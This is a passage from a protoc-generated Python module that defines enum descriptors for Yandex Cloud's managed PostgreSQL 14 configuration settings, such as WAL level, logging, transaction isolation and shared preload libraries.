\x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x41\n\x1cpg_qualstats_track_constants\x18\x91\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x36\n\x10pg_qualstats_max\x18\x92\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19pg_qualstats_resolve_oids\x18\x93\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x18pg_qualstats_sample_rate\x18\x94\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\"S\n\x08WalLevel\x12\x19\n\x15WAL_LEVEL_UNSPECIFIED\x10\x00\x12\x15\n\x11WAL_LEVEL_REPLICA\x10\x01\x12\x15\n\x11WAL_LEVEL_LOGICAL\x10\x02\"\xd6\x01\n\x11SynchronousCommit\x12\"\n\x1eSYNCHRONOUS_COMMIT_UNSPECIFIED\x10\x00\x12\x19\n\x15SYNCHRONOUS_COMMIT_ON\x10\x01\x12\x1a\n\x16SYNCHRONOUS_COMMIT_OFF\x10\x02\x12\x1c\n\x18SYNCHRONOUS_COMMIT_LOCAL\x10\x03\x12#\n\x1fSYNCHRONOUS_COMMIT_REMOTE_WRITE\x10\x04\x12#\n\x1fSYNCHRONOUS_COMMIT_REMOTE_APPLY\x10\x05\"\x9a\x01\n\x13\x43onstraintExclusion\x12$\n CONSTRAINT_EXCLUSION_UNSPECIFIED\x10\x00\x12\x1b\n\x17\x43ONSTRAINT_EXCLUSION_ON\x10\x01\x12\x1c\n\x18\x43ONSTRAINT_EXCLUSION_OFF\x10\x02\x12\"\n\x1e\x43ONSTRAINT_EXCLUSION_PARTITION\x10\x03\"\x92\x01\n\x11\x46orceParallelMode\x12#\n\x1f\x46ORCE_PARALLEL_MODE_UNSPECIFIED\x10\x00\x12\x1a\n\x16\x46ORCE_PARALLEL_MODE_ON\x10\x01\x12\x1b\n\x17\x46ORCE_PARALLEL_MODE_OFF\x10\x02\x12\x1f\n\x1b\x46ORCE_PARALLEL_MODE_REGRESS\x10\x03\"\x92\x02\n\x08LogLevel\x12\x19\n\x15LOG_LEVEL_UNSPECIFIED\x10\x00\x12\x14\n\x10LOG_LEVEL_DEBUG5\x10\x01\x12\x14\n\x10LOG_LEVEL_DEBUG4\x10\x02\x12\x14\n\x10LOG_LEVEL_DEBUG3\x10\x03\x12\x14\n\x10LOG_LEVEL_DEBUG2\x10\x04\x12\x14\n\x10LOG_LEVEL_DEBUG1\x10\x05\x12\x11\n\rLOG_LEVEL_LOG\x10\x06\x12\x14\n\x10LOG_LEVEL_NOTICE\x10\x07\x12\x15\n\x11LOG_LEVEL_WARNING\x10\x08\x12\x13\n\x0fLOG_LEVEL_ERROR\x10\t\x12\x13\n\x0fLOG_LEVEL_FATAL\x10\n\x12\x13\n\x0fLOG_LEVEL_PANIC\x10\x0b\"\x99\x01\n\x11LogErrorVerbosity\x12#\n\x1fLOG_ERROR_VERBOSITY_UNSPECIFIED\x10\x00\x12\x1d\n\x19LOG_ERROR_VERBOSITY_TERSE\x10\x01\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_DEFAULT\x10\x02\x12\x1f
\n\x1bLOG_ERROR_VERBOSITY_VERBOSE\x10\x03\"\x8a\x01\n\x0cLogStatement\x12\x1d\n\x19LOG_STATEMENT_UNSPECIFIED\x10\x00\x12\x16\n\x12LOG_STATEMENT_NONE\x10\x01\x12\x15\n\x11LOG_STATEMENT_DDL\x10\x02\x12\x15\n\x11LOG_STATEMENT_MOD\x10\x03\x12\x15\n\x11LOG_STATEMENT_ALL\x10\x04\"\xe6\x01\n\x14TransactionIsolation\x12%\n!TRANSACTION_ISOLATION_UNSPECIFIED\x10\x00\x12*\n&TRANSACTION_ISOLATION_READ_UNCOMMITTED\x10\x01\x12(\n$TRANSACTION_ISOLATION_READ_COMMITTED\x10\x02\x12)\n%TRANSACTION_ISOLATION_REPEATABLE_READ\x10\x03\x12&\n\"TRANSACTION_ISOLATION_SERIALIZABLE\x10\x04\"[\n\x0b\x42yteaOutput\x12\x1c\n\x18\x42YTEA_OUTPUT_UNSPECIFIED\x10\x00\x12\x14\n\x10\x42YTEA_OUTPUT_HEX\x10\x01\x12\x18\n\x14\x42YTEA_OUTPUT_ESCAPED\x10\x02\"R\n\tXmlBinary\x12\x1a\n\x16XML_BINARY_UNSPECIFIED\x10\x00\x12\x15\n\x11XML_BINARY_BASE64\x10\x01\x12\x12\n\x0eXML_BINARY_HEX\x10\x02\"X\n\tXmlOption\x12\x1a\n\x16XML_OPTION_UNSPECIFIED\x10\x00\x12\x17\n\x13XML_OPTION_DOCUMENT\x10\x01\x12\x16\n\x12XML_OPTION_CONTENT\x10\x02\"\x9a\x01\n\x0e\x42\x61\x63kslashQuote\x12\x1f\n\x1b\x42\x41\x43KSLASH_QUOTE_UNSPECIFIED\x10\x00\x12\x13\n\x0f\x42\x41\x43KSLASH_QUOTE\x10\x01\x12\x16\n\x12\x42\x41\x43KSLASH_QUOTE_ON\x10\x02\x12\x17\n\x13\x42\x41\x43KSLASH_QUOTE_OFF\x10\x03\x12!\n\x1d\x42\x41\x43KSLASH_QUOTE_SAFE_ENCODING\x10\x04\"\x99\x01\n\rPlanCacheMode\x12\x1f\n\x1bPLAN_CACHE_MODE_UNSPECIFIED\x10\x00\x12\x18\n\x14PLAN_CACHE_MODE_AUTO\x10\x01\x12%\n!PLAN_CACHE_MODE_FORCE_CUSTOM_PLAN\x10\x02\x12&\n\"PLAN_CACHE_MODE_FORCE_GENERIC_PLAN\x10\x03\"\xd0\x01\n\x14PgHintPlanDebugPrint\x12(\n$PG_HINT_PLAN_DEBUG_PRINT_UNSPECIFIED\x10\x00\x12 \n\x1cPG_HINT_PLAN_DEBUG_PRINT_OFF\x10\x01\x12\x1f\n\x1bPG_HINT_PLAN_DEBUG_PRINT_ON\x10\x02\x12%\n!PG_HINT_PLAN_DEBUG_PRINT_DETAILED\x10\x03\x12$\n 
PG_HINT_PLAN_DEBUG_PRINT_VERBOSE\x10\x04\"\xed\x01\n\x16SharedPreloadLibraries\x12(\n$SHARED_PRELOAD_LIBRARIES_UNSPECIFIED\x10\x00\x12)\n%SHARED_PRELOAD_LIBRARIES_AUTO_EXPLAIN\x10\x01\x12)\n%SHARED_PRELOAD_LIBRARIES_PG_HINT_PLAN\x10\x02\x12(\n$SHARED_PRELOAD_LIBRARIES_TIMESCALEDB\x10\x03\x12)\n%SHARED_PRELOAD_LIBRARIES_PG_QUALSTATS\x10\x04\"\x8f\x02\n\x15PostgresqlConfigSet14\x12S\n\x10\x65\x66\x66\x65\x63tive_config\x18\x01 \x01(\x0b\x32\x39.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14\x12N\n\x0buser_config\x18\x02 \x01(\x0b\x32\x39.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14\x12Q\n\x0e\x64\x65\x66\x61ult_config\x18\x03 \x01(\x0b\x32\x39.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14B\x81\x01\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresqlb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,yandex_dot_cloud_dot_validation__pb2.DESCRIPTOR,])
# Nested enum PostgresqlConfig14.WalLevel (protoc-generated descriptor;
# edit postgresql14.proto and regenerate rather than changing this by hand).
_POSTGRESQLCONFIG14_WALLEVEL = _descriptor.EnumDescriptor(
  name='WalLevel',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.WalLevel',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='WAL_LEVEL_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='WAL_LEVEL_REPLICA', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='WAL_LEVEL_LOGICAL', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=10036,
  serialized_end=10119,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_WALLEVEL)
# Nested enum PostgresqlConfig14.SynchronousCommit (protoc-generated descriptor).
_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT = _descriptor.EnumDescriptor(
  name='SynchronousCommit',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SynchronousCommit',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='SYNCHRONOUS_COMMIT_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SYNCHRONOUS_COMMIT_ON', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SYNCHRONOUS_COMMIT_OFF', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SYNCHRONOUS_COMMIT_LOCAL', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SYNCHRONOUS_COMMIT_REMOTE_WRITE', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SYNCHRONOUS_COMMIT_REMOTE_APPLY', index=5, number=5,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=10122,
  serialized_end=10336,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT)
# Nested enum PostgresqlConfig14.ConstraintExclusion (protoc-generated descriptor).
_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION = _descriptor.EnumDescriptor(
  name='ConstraintExclusion',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ConstraintExclusion',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='CONSTRAINT_EXCLUSION_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='CONSTRAINT_EXCLUSION_ON', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='CONSTRAINT_EXCLUSION_OFF', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='CONSTRAINT_EXCLUSION_PARTITION', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=10339,
  serialized_end=10493,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION)
# Nested enum PostgresqlConfig14.ForceParallelMode (protoc-generated descriptor).
_POSTGRESQLCONFIG14_FORCEPARALLELMODE = _descriptor.EnumDescriptor(
  name='ForceParallelMode',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ForceParallelMode',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='FORCE_PARALLEL_MODE_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='FORCE_PARALLEL_MODE_ON', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='FORCE_PARALLEL_MODE_OFF', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='FORCE_PARALLEL_MODE_REGRESS', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=10496,
  serialized_end=10642,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_FORCEPARALLELMODE)
# Nested enum PostgresqlConfig14.LogLevel (protoc-generated descriptor).
# Shared by client_min_messages, log_min_messages, log_min_error_statement
# and pg_hint_plan_message_level fields.
_POSTGRESQLCONFIG14_LOGLEVEL = _descriptor.EnumDescriptor(
  name='LogLevel',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_DEBUG5', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_DEBUG4', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_DEBUG3', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_DEBUG2', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_DEBUG1', index=5, number=5,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_LOG', index=6, number=6,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_NOTICE', index=7, number=7,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_WARNING', index=8, number=8,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_ERROR', index=9, number=9,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_FATAL', index=10, number=10,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_LEVEL_PANIC', index=11, number=11,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=10645,
  serialized_end=10919,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_LOGLEVEL)
# Nested enum PostgresqlConfig14.LogErrorVerbosity (protoc-generated descriptor).
_POSTGRESQLCONFIG14_LOGERRORVERBOSITY = _descriptor.EnumDescriptor(
  name='LogErrorVerbosity',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogErrorVerbosity',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='LOG_ERROR_VERBOSITY_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_ERROR_VERBOSITY_TERSE', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_ERROR_VERBOSITY_DEFAULT', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_ERROR_VERBOSITY_VERBOSE', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=10922,
  serialized_end=11075,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_LOGERRORVERBOSITY)
# Nested enum PostgresqlConfig14.LogStatement (protoc-generated descriptor).
_POSTGRESQLCONFIG14_LOGSTATEMENT = _descriptor.EnumDescriptor(
  name='LogStatement',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogStatement',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='LOG_STATEMENT_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_STATEMENT_NONE', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_STATEMENT_DDL', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_STATEMENT_MOD', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='LOG_STATEMENT_ALL', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=11078,
  serialized_end=11216,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_LOGSTATEMENT)
# Nested enum PostgresqlConfig14.TransactionIsolation (protoc-generated descriptor).
_POSTGRESQLCONFIG14_TRANSACTIONISOLATION = _descriptor.EnumDescriptor(
  name='TransactionIsolation',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.TransactionIsolation',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='TRANSACTION_ISOLATION_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='TRANSACTION_ISOLATION_READ_UNCOMMITTED', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='TRANSACTION_ISOLATION_READ_COMMITTED', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='TRANSACTION_ISOLATION_REPEATABLE_READ', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='TRANSACTION_ISOLATION_SERIALIZABLE', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=11219,
  serialized_end=11449,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_TRANSACTIONISOLATION)
# Nested enum PostgresqlConfig14.ByteaOutput (protoc-generated descriptor).
_POSTGRESQLCONFIG14_BYTEAOUTPUT = _descriptor.EnumDescriptor(
  name='ByteaOutput',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ByteaOutput',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='BYTEA_OUTPUT_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='BYTEA_OUTPUT_HEX', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='BYTEA_OUTPUT_ESCAPED', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=11451,
  serialized_end=11542,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_BYTEAOUTPUT)
# Nested enum PostgresqlConfig14.XmlBinary (protoc-generated descriptor).
_POSTGRESQLCONFIG14_XMLBINARY = _descriptor.EnumDescriptor(
  name='XmlBinary',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlBinary',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='XML_BINARY_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='XML_BINARY_BASE64', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='XML_BINARY_HEX', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=11544,
  serialized_end=11626,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_XMLBINARY)
# Nested enum PostgresqlConfig14.XmlOption (protoc-generated descriptor).
_POSTGRESQLCONFIG14_XMLOPTION = _descriptor.EnumDescriptor(
  name='XmlOption',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlOption',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='XML_OPTION_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='XML_OPTION_DOCUMENT', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='XML_OPTION_CONTENT', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets into DESCRIPTOR.serialized_pb — must match the generator output.
  serialized_start=11628,
  serialized_end=11716,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_XMLOPTION)
# Generated protobuf metadata -- do not edit by hand; regenerate with protoc.
# Enum descriptor for PostgresqlConfig14.BackslashQuote (presumably mirrors
# the PostgreSQL `backslash_quote` setting -- confirm against the .proto
# source): UNSPECIFIED=0, (legacy unqualified)=1, ON=2, OFF=3,
# SAFE_ENCODING=4.
_POSTGRESQLCONFIG14_BACKSLASHQUOTE = _descriptor.EnumDescriptor(
  name='BackslashQuote',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.BackslashQuote',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='BACKSLASH_QUOTE_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='BACKSLASH_QUOTE', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='BACKSLASH_QUOTE_ON', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='BACKSLASH_QUOTE_OFF', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='BACKSLASH_QUOTE_SAFE_ENCODING', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets of this enum's definition inside the serialized file
  # descriptor held by DESCRIPTOR; must stay in sync with the generator.
  serialized_start=11719,
  serialized_end=11873,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_BACKSLASHQUOTE)
# Generated protobuf metadata -- do not edit by hand; regenerate with protoc.
# Enum descriptor for PostgresqlConfig14.PlanCacheMode (presumably mirrors
# the PostgreSQL `plan_cache_mode` setting -- confirm against the .proto
# source): UNSPECIFIED=0, AUTO=1, FORCE_CUSTOM_PLAN=2, FORCE_GENERIC_PLAN=3.
_POSTGRESQLCONFIG14_PLANCACHEMODE = _descriptor.EnumDescriptor(
  name='PlanCacheMode',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PlanCacheMode',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='PLAN_CACHE_MODE_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PLAN_CACHE_MODE_AUTO', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PLAN_CACHE_MODE_FORCE_CUSTOM_PLAN', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PLAN_CACHE_MODE_FORCE_GENERIC_PLAN', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets of this enum's definition inside the serialized file
  # descriptor held by DESCRIPTOR; must stay in sync with the generator.
  serialized_start=11876,
  serialized_end=12029,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_PLANCACHEMODE)
# Generated protobuf metadata -- do not edit by hand; regenerate with protoc.
# Enum descriptor for PostgresqlConfig14.PgHintPlanDebugPrint (presumably
# mirrors the pg_hint_plan extension's `pg_hint_plan.debug_print` setting --
# confirm against the .proto source): UNSPECIFIED=0, OFF=1, ON=2,
# DETAILED=3, VERBOSE=4.
_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT = _descriptor.EnumDescriptor(
  name='PgHintPlanDebugPrint',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PgHintPlanDebugPrint',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='PG_HINT_PLAN_DEBUG_PRINT_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PG_HINT_PLAN_DEBUG_PRINT_OFF', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PG_HINT_PLAN_DEBUG_PRINT_ON', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PG_HINT_PLAN_DEBUG_PRINT_DETAILED', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PG_HINT_PLAN_DEBUG_PRINT_VERBOSE', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets of this enum's definition inside the serialized file
  # descriptor held by DESCRIPTOR; must stay in sync with the generator.
  serialized_start=12032,
  serialized_end=12240,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT)
# Generated protobuf metadata -- do not edit by hand; regenerate with protoc.
# Enum descriptor for PostgresqlConfig14.SharedPreloadLibraries (presumably
# the extensions that may be listed in PostgreSQL's `shared_preload_libraries`
# setting -- confirm against the .proto source): UNSPECIFIED=0,
# AUTO_EXPLAIN=1, PG_HINT_PLAN=2, TIMESCALEDB=3, PG_QUALSTATS=4.
_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES = _descriptor.EnumDescriptor(
  name='SharedPreloadLibraries',
  full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SharedPreloadLibraries',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='SHARED_PRELOAD_LIBRARIES_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SHARED_PRELOAD_LIBRARIES_AUTO_EXPLAIN', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SHARED_PRELOAD_LIBRARIES_PG_HINT_PLAN', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
